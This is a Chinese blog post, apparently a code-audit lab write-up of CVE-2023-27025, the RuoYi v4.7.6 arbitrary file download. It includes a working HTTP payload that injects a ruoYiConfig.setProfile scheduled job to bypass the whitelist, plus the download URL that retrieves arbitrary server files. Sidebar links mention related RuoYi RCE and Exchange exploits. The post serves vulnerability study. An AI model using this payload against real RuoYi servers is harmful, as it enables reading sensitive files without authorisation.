若依4.7.6 版本任意文件下载(CVE-2023-27025)

已于 2023-10-10 09:50:43 修改
阅读量1.8k 收藏
点赞数 2
分类专栏: 代码审计 文章标签: 网络安全 java
于 2023-10-09 20:19:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41690468/article/details/133713912
版权

CVE-2023-27025

框架说明

若依/ruoyi 是使用java主流框架的一款优秀的国内开源cms,
基于SpringBoot、Shiro、Mybatis的权限后台管理系统。

环境搭建

查询最近的漏洞信息

https://cve.mitre.org/
搜索ruoyi
在这里插入图片描述

代码审计感兴趣的漏洞:CVE-2023-27025

An arbitrary file download vulnerability in the background management module of RuoYi v4.7.6 and below allows attackers to download arbitrary files in the server.

源码下载地址

https://gitee.com/y_project/RuoYi/releases

在这里插入图片描述

环境搭建


配置数据库

使用phpstudy_pro 开启和配置一下数据库

在这里插入图片描述

配置一下数据库地址
在这里插入图片描述

导入测试数据库

nvaicat新建一个数据库名为ry的数据库,并运行下面两个sql脚本导入测试数据。

在这里插入图片描述

在这里插入图片描述


启动服务

idea绿色的运行按钮点击一下
在这里插入图片描述
可以访问到,环境搭建成功。

在这里插入图片描述

代码审计

参考文章:

https://gitee.com/y_project/RuoYi/commit/432d5ce1be2e9384a6230d7ccd8401eef5ce02b0
https://gitee.com/y_project/RuoYi/issues/I697Q5

审计

通过补丁修复的位置可以快速定位到问题代码
在这里插入图片描述

执行一下任务接口

/monitor/job/run
跟踪一下代码流程
在这里插入图片描述
在这里插入图片描述

全局搜索
shift键快速按两次
在这里插入图片描述
下好断点,停止服务,开启debug模式,跟进的服务层。
在这里插入图片描述

这里好像不是漏洞的关键点

添加任务绕过白名单(自定义下载文件路径)

POST /monitor/job/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/monitor/job
Cookie: JSESSIONID=b32de574-334d-4831-85bb-17adecd6484e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

createBy=admin&jobName=renwu&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('e://1.txt')&cronExpression=0%2F15+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=

在这里插入图片描述

添加任务
下断点跟进,发现有很多过滤
src/main/java/com/ruoyi/quartz/controller/SysJobController.java
在这里插入图片描述

跟进whiteList(ctrl+鼠标左键点击一下),跟进白名单,发现漏洞修复的关键代码
在这里插入图片描述
这里成获取到对象,将转换为bean的对象再进行白名单检测
src/main/java/com/ruoyi/quartz/util/ScheduleUtils.java
在这里插入图片描述
在这里插入图片描述

下一步
在这里插入图片描述
一直下一步
通过else if (StringUtils.containsAnyIgnoreCase(job.getInvokeTarget(), Constants.JOB_ERROR_STR))
的判断
在这里插入图片描述
直接放行,添加成功。
在这里插入图片描述

下载功能(触发下载刚刚定义的下载文件)

http://127.0.0.1/common/download/resource?resource=Info.xml:.zip
下载无内容
在这里插入图片描述

执行一次定时任务后,再次访问下载地址
http://127.0.0.1/common/download/resource?resource=Info.xml:.zip
在这里插入图片描述

为什么通过这个接口就可以下载

根据payload设置反向查找关键代码,payload搜索setProfile方法
在这里插入图片描述
src/main/java/com/ruoyi/common/config/RuoYiConfig.java
在这里插入图片描述

payload修改的是profile 的地址
application.yml
在这里插入图片描述

执行一下payload

计划任务就是动态修改application.yaml
在这里插入图片描述

这里跟进一下函数,看是如何修改profile参数的
执行计划任务一次在这里插入图片描述

然后通过下载接口去下载任意文件,任意文件下载中的下载接口
http://127.0.0.1/common/download/resource?resource=Info.xml:.zip
在这里插入图片描述
在这里插入图片描述
下载定义的文件。
在这里插入图片描述

为什么要下载 info.xml:.zip 呢?

跟进到请求地址 /common/download/resource
这里下载有过滤
在这里插入图片描述
跟进一下checkAllowDownload这个函数
ctrl+鼠标左键 点击要调整的函数(checkAllowDownload)就可以调整进来


滤了.. 上一级目录

在这里插入图片描述

跟进允许的文件规则
在这里插入图片描述

允许zip格式的下载,白名单
在这里插入图片描述

回到原来下载文件中的
src/main/java/com/ruoyi/web/controller/common/CommonController.java
在这里插入图片描述
通过getProfile() 获取到之前计划任务定义好的文件路径
在这里插入图片描述
下载成功
在这里插入图片描述

这里可以是随便的文件名,只要是白名单就可以。传入的需要下载的文件路径是用过计划任务传入的参数。
在这里插入图片描述

菜鸡学安全
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
若依任意文件下载CVE-2023-27025
qq_32445755的博客
05-10 1378
若依它就是一个开源项目,任何公司的各种大的项目必然需要一个后台权限管理系统,这是必然的,但是如果不想投入太多人力物力去开发,又恰好有现成且比较好用的别人已经完成的项目直接供我们来使用。1、使用、减少工作量2、学习优秀的开源项目底层的编程思想,设计思路,提高自己的编程能力。
Ruoyi框架学习--上传和下载
热门推荐
qq_39367410的博客
09-13 1万+
1、前端就是给了个按钮,点一下就开始文件上传了。2、然后开始上传走到后端来,运行核心方法:com.ruoyi.web.controller.system.SysProfileController3、其中牵扯到一个重要的文件上传方法:com.ruoyi.common.utils.file.FileUploadUtils下的。
vue中request.js中axios请求和(若依)文件通用下载方法封装
心藏_的博客
09-18 2016
vue中request.js中axios请求和(若依)文件通用下载方法封装
【RuoYi】实现文件的上传与下载
最新发布
qq_51933234的博客
06-02 1451
首先,最近在做一个管理系统,里面刚好需要用到echarts图和富文本编辑器,然后我自己去看了官网觉得有点不好懂,于是去B站看来很多视频,然后看到了up主【程序员青戈】的视频,看了他讲的echarts图和富文本编辑器部分的内容,觉得讲的很好,很推荐大家去观看他的视频。然后在富文本编辑器这部分内容中,需要用到,文件上传与下载的部分知识,所以这里做一个笔记,来记录关于这部得分的内容,echarts图和富文本编辑器部分的内容也会在后面的博客中介绍。希望对大家有所帮助啦~ 导入hutool的依赖 三、文件上传
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 3361
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
Ruoyi若依框架下载流程详细解读(SpringBoot-Vue)
警警的博客
03-25 3536
Ruoyi若依框架下载流程详细解读(SpringBoot-Vue)
最新Ruoyi组合拳RCE分析
2401_83799022的博客
03-25 1107
直接执行sql来更改定时任务内容,从而绕过黑白名单的限制。最新版ruoyi rce的方法依旧是在定时任务处:定时任务中可以调用特定包内的bean,通过。众所周知,ruoyi计划任务能调用bean或者class类,这里就是通过调用。此时任务3的调用字符串已经是Jndi payload了,后面直接通过。添加任务:修改id为3的计划任务为jndi payload,并执行。在启动类中我们可以修改代码如下,打印出项目中所有加载的bean,的配置文件为任意想要读取的文件即可,也就达到了任意文件读取效果。
WowzaStreamingEngine-4.7.6-linux-x64-installer.run
07-20
Wowza WowzaStreamingEngine 4.7.6 linux 安装包 ~~~~~~
4.7.6继电器输出冗余端子板XS-32RDO-RL(通用)
03-23
介绍了关于4.7.6继电器输出冗余端子板XS-32RDO-RL(通用)的详细说明,提供新大新产品的技术资料的下载。
phpMyAdmin-4.7.6-all-languages.zip
12-02
1. **下载**:首先,你需要从官方网站获取“phpMyAdmin-4.7.6-all-languages.zip”压缩包,确保文件来源可靠,避免下载带有病毒或恶意软件的版本。 2. **解压**:将下载的zip文件解压缩到服务器的适当目录,通常是...
4.7.6继电器输出冗余端子板S-32RDO-RL(通用)
03-23
介绍了关于4.7.6继电器输出冗余端子板S-32RDO-RL(通用)的详细说明,提供其它国内产品的技术资料的下载。
文件上传和下载文件上传和下载文件上传和下载
12-11
文件上传和下载文件上传和下载文件上传和下载文件上传和下载文件上传和下载文件上传和下载文件上传和下载
CVE-2017-11780 windows高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞, 针对CVE-2017-11771的Windows Search远程代码执行漏洞
CVE-2021-26855
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 添加其他功能(用户枚举等)后不久,原始存储库被删除。 如果您有最新版本,请发布拉取请求。 CVE-2021-26855 SSRF轻松使用Golang练习 受影响的版本: Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 使用条件: 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求: Vulnerability in the target server The target exchange server must be a
snipe-it-4.7.6.tar.gz
09-07
4.7.6是该软件的一个版本,这个版本可能包含了一些优化和改进,以提供更好的用户体验和增强功能。在解压"snipe-it-4.7.6.tar.gz"文件后,你会得到名为"snipe-it-4.7.6"的文件夹,其中包含了软件的所有源代码和相关...
ruoyi-springboot通过接口下载文件配置
qq_40580129的博客
09-01 1128
package com.ruoyi.web.controller.groundwater.monitor; import cn.hutool.core.io.file.FileReader; import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper; import com.baomidou.mybatisplus.core.toolkit.Wrappers; import com.ruoyi.common.constant.Ba.
若依前后端分离框架下载需要授权的url文件,解决跨域问题
Hunter_Kevin的博客
03-24 6259
一、问题描述: 使用若依前后端分离项目,前台点击下载图片,触发下载事件,而不是直接打开显示图片 二、解决思路: 前端调用后端接口,将需要下载的图片https链接传给后端下载 后端需要设置响应头response.addHeader("Access-Control-Allow-Origin", "*"); 允许跨域 前端需要设置 responseType: 'blob' 告诉后端前端需要的是blob二进制文件流,否则会导致返回乱码 前端发送请求调用后端自定义文件下载接口的代码可以参考:链接指引 或者 前
若依项目启动和下载
m0_75015491的博客
11-21 2562
若依平台的使用
若依可以挂php,Centos7 部署若依前后端分离项目
weixin_42551310的博客
03-11 1551
文章目录一、本地准备1. 克隆项目到本地2. 前端项目3. 后端项目4. nginx配置文件二、Centos7 环境准备2.1. 安装mysql并启动2.2. 安装redis并启动2.3. 安装nginx 和配置nginx.conf文件三、测试验证3.1. 上传准备好的文件3.2. 启动后端项目3.3. 登录验证.附上完整的nginx配置文件一、本地准备1. 克隆项目到本地git clone g...
sudo apt-cache madison samba 返回值含义
05-19
`sudo apt-cache madison samba` 命令会列出系统中所有可用的 Samba 软件包及其版本信息,返回值的含义如下: - 第一列是软件包的名称。 - 第二列是软件包的版本号。 - 第三列是软件包所在的仓库名称和仓库地址。 - 第四列是软件包的发布时间和日期。 例如,以下是 `sudo apt-cache madison samba` 命令的返回值示例: ``` samba | 2:4.7.6+dfsg~ubuntu-0ubuntu2.20 | http://archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages samba | 2:4.7.6+dfsg~ubuntu-0ubuntu2 | http://archive.ubuntu.com/ubuntu focal/main amd64 Packages ``` 这个示例中,第一列是软件包的名称 `samba`,第二列是软件包的版本号,分别为 `2:4.7.6+dfsg~ubuntu-0ubuntu2.20` 和 `2:4.7.6+dfsg~ubuntu-0ubuntu2`。第三列是软件包所在的仓库名称和仓库地址,分别为 `focal-updates/main` 和 `focal/main`。第四列是软件包的发布时间和日期。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值